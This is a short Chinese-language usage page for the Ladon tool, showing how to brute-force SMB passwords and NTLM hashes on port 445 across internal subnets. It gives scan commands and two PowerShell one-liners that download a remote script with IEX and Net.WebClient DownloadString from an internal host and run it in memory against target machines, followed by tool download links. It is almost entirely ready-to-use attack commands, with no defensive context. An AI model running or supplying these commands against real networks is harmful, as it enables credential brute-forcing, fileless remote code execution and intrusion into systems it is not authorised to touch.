SmbScan 445端口弱口令/SMB密码爆破

<%

Ladon

445端口 SMB密码爆破(Windows)

Ladon 192.168.1.8/24 SmbScan
image

445端口 SMB NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 SmbHashScan
image

PowerLadon

远程加载SmbScan 445端口弱口令爆破

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.141 SmbScan”
image

远程加载SmbHash爆破内网主机(NtlmHash)

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.40 SmbHash”
image

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases